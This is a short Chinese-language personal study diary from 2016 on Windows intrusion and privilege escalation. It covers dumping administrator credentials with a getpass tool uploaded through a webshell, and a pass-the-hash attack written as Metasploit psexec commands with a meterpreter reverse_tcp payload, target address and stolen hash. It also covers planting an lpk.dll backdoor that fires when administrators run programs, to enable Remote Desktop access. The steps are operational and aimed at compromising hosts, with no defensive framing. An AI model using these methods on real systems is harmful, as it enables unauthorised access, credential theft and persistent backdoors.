2016年4月11号渗透总结

  今天又学了几个提权的方法。

   1.getpass提权，去网上下载getpass工具，拿到网站的webshell后把这个工具上传上去，然后调用cmd来执行这个程序，管理员的账号和密码就会显示出来，很强大的一款工具，但是主机如果是安装的盗版系统，这个工具有时候就会失效。

 

2.hash传递入侵，这个入侵就需要用到有名的工具metasploit了，这个工具有windows和linux两个版本，可以去官网上下载。步骤如下：

启动msf msfconsole

1. use exploit/windows/smb/psexec 用到hash传递入侵的模块

2. show options 查看选项配置信息

 3.set PAYLOAD windows/meterpreter/reverse_tcp 设置载荷

  4.set LHOST 本机地址

  5.set RHOST 目标地址

  6.set SMBUser adminstriator

  7.set SMBPass 目标机hash值

  8exploit

这里还需要用到一个获取目标及管理员hash值得工具，去网上下载，上传到目标主机中，用cmd运行就可以得到hash值，这样就ok了。

3.

相当于钓鱼，需要管理员配合。

条件：3389远程桌面开启 触发lpk后门

触发条件：当前目录存在lpk.dll及exe程序，exe程序被运行，即触发后门

通过工具生成lpk.dll再通过webshell上传到管理员常用的exe程序目录下，等待管理员触发执行。

工具 tools lpk sethc 用这个工具需要先通过webshell上传一个开3389的程序，生成的文件名字必须叫lpk不能叫别的。

触发后在通过远程桌面链接就可以了（这个方法我看了小迪的两套视频，他都没有试成功，我也试了几次也没有成功，真不知道是怎么回事。）